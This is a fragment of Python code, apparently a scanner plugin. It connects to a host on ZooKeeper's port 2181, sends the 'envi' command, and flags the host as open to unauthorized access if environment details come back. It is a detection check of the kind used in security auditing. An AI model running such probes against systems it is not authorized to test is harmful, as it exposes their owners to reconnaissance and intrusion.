- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((ip, 2181))
- s.send('envi')
- data = s.recv(1024)
- if 'Environment' in data:
- save_user_script_result(self, '', 'zookeeper://%s:2181' % ip, '', 'Zookeeper Unauthorized Access')
- except Exception as e:
- pass
- finally:
- s.close()